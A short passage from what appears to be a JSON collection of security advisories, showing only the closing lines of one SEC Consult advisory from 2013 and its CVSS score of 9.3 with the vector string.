com\nhttps://www.sec-consult.com\nhttp://blog.sec-consult.com\n\n\nEOF Wolfgang Ettlinger, Stefan Viehb\u00f6ck / @2013", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
